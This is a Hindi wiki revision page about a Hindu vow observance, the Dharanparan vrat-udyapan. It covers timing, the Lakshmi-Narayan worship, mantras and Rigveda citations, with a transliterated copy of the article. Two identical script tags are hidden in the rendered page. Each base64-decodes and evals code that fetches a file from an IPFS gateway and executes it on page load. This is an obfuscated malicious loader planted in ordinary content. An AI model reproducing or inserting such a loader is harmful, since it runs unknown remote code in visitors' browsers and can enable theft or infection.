Difference between revisions of "धारणपारण व्रतोद्यापन"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - " {{लेख प्रगति |आधार=आधार1 |प्रारम्भिक= |माध्यमिक= |पूर्णता= |शोध= }}" to "")
m (Text replace - ")</ref" to "</ref")
 
(3 intermediate revisions by 3 users not shown)
Line 1: Line 1:
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
+
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
 
*चातुर्मास्य में [[एकादशी]] पर या आगे प्रथम मास में या अन्तिम मास में होता है।
 
*चातुर्मास्य में [[एकादशी]] पर या आगे प्रथम मास में या अन्तिम मास में होता है।
 
*उपवास (धारण) एक मास में और पारण दूसरे मास में होता है।
 
*उपवास (धारण) एक मास में और पारण दूसरे मास में होता है।
 
*एक जलपूर्ण घड़े पर [[लक्ष्मी]] एवं [[नारायण]] की प्रतिमाओं को रखकर रात्रि में पंचामृत किया जाता है।  
 
*एक जलपूर्ण घड़े पर [[लक्ष्मी]] एवं [[नारायण]] की प्रतिमाओं को रखकर रात्रि में पंचामृत किया जाता है।  
 
*पुष्पों एवं तुलसी के दलों से 'ओं नमों नारायण' मन्त्र को 108 बार कहकर पूजा करनी होती है।  
 
*पुष्पों एवं तुलसी के दलों से 'ओं नमों नारायण' मन्त्र को 108 बार कहकर पूजा करनी होती है।  
*अर्ध्य; उबाले हुए तिल एवं चावल का [[ऋग्वेद]]<ref>ऋग्वेद, (10|112|9)</ref> के मन्त्र के साथ एवं उबाले हुए चावल एवं घी का ऋग्वेद<ref>ऋग्वेद(10|155|1)</ref> के मन्त्र के साथ होम किया जाता है।<ref>स्मृतिकौस्तुभ (414-416); व्रतार्क (365 ए-366 बी)।</ref>
+
*अर्ध्य; उबाले हुए तिल एवं चावल का [[ऋग्वेद]]<ref>ऋग्वेद, (10|112|9</ref> के मन्त्र के साथ एवं उबाले हुए चावल एवं घी का ऋग्वेद<ref>ऋग्वेद(10|155|1</ref> के मन्त्र के साथ होम किया जाता है।<ref>स्मृतिकौस्तुभ (414-416); व्रतार्क (365 ए-366 बी)।</ref>
 
+
{{प्रचार}}
 +
{{संदर्भ ग्रंथ}}
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>

Latest revision as of 12:51, 27 July 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • chaturmasy mean ekadashi par ya age pratham mas mean ya antim mas mean hota hai.
  • upavas (dharan) ek mas mean aur paran doosare mas mean hota hai.
  • ek jalapoorn gh de par lakshmi evan narayan ki pratimaoan ko rakhakar ratri mean panchamrit kiya jata hai.
  • pushpoan evan tulasi ke daloan se 'oan namoan narayan' mantr ko 108 bar kahakar pooja karani hoti hai.
  • ardhy; ubale hue til evan chaval ka rrigved[1] ke mantr ke sath evan ubale hue chaval evan ghi ka rrigved[2] ke mantr ke sath hom kiya jata hai.[3]

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. rrigved, (10|112|9
  2. rrigved(10|155|1
  3. smritikaustubh (414-416); vratark (365 e-366 bi).

any sanbandhit liank

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>